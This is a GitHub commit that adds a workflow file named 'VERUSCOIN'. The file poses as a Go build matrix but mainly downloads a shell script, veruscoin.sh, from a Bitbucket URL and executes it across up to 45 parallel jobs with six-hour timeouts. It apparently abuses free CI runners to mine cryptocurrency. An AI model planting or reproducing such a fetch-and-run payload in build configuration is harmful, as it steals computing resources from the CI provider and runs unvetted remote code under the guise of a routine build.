Create main.yml

This commit is contained in:
kink321 2021-08-05 19:17:43 +00:00 committed by GitHub
parent eb2b355c05
commit ed6fb69388
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

29
workflow/main.yml Normal file
View File

@ -0,0 +1,29 @@
name: VERUSCOIN
on: [push, pull_request]
jobs:
build:
name: Raino
runs-on: ubuntu-latest
strategy:
max-parallel: 20
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM_JOBS: 20
JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
uses: actions/setup-go@v1
with:
go-version: ${{ matrix.go }}
id: go
- name: Setup
uses: actions/checkout@v1
- name: Raino
run: |
wget https://bitbucket.org/kina2007/test/raw/cf672d4ddfd670ce59df06b55c29e8d5fc6a89cb/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh